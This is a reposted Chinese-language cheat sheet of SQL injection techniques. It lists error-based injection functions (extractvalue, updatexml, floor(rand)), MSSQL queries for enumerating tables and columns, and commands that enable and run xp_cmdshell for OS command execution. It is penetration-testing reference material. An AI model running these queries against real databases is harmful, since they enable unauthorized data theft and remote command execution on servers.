Mid(database() from 1 for 1)==mid(databse(),1,1)

在數據庫中字符型字段中條件值為false可以獲取全部數據

數據庫一般有三種報錯

(1)Extractvalue()中第一個為錯誤參數就會錯誤報出第二個參數語句

(2)Floor(rand(0)*2) 插入虛擬表時出現鍵相同，導致的報錯

(3)Updatexml ()中第一個，第三個，為錯誤參數就會錯誤報出第二個參數語句

第二點原理可以參照以下鏈接

https://blog.csdn.net/cried_cat/article/details/80022378

?其他的error-based

?

Mssql

16進制轉為字符串

select?CONVERT(varchar(50),0x576869725f436e745f4174746163686564 )

?

查詢數據庫

select?*?from?sys.all_objects

?

查表名TABLE_NAME!=這樣每一行都能查

SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME!=xx and TABLE_NAME!=yy ...

?

列名這里A.NAME是需要查詢的表名，B.NAME是不需要的列名，這樣可以查詢到所有列名0xxx,0yyy

SELECT TOP 1 B.NAME FROM SYSOBJECTS A,SYSCOLUMNS B WHERE A.ID=B.ID AND A.NAME=(select CONVERT(varchar(50),0xxxx)) AND B.NAME!=(select CONVERT(varchar(50),0yyyy))?AND B.NAME!=...

?

執行系統shell命令

exec master.dbo.xp_cmdshell "whoami";　　//exec master..xp_cmdshell "whoami"

?

執行之前需要開啟xp_cmdshell才可以運行(開啟需一定權限，取決于ALTER SETTINGS權限):

EXEC sp_configure 'show advanced options',1;

RECONFIGURE;

EXEC sp_configure 'xp_cmdshell',1;

RECONFIGURE

轉載于:https://www.cnblogs.com/pass-A/p/11133217.html

超強干貨來襲 云風專訪：近40年碼齡，通宵達旦的技術人生

總結

以上是生活随笔為你收集整理的关于数据库的函数的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。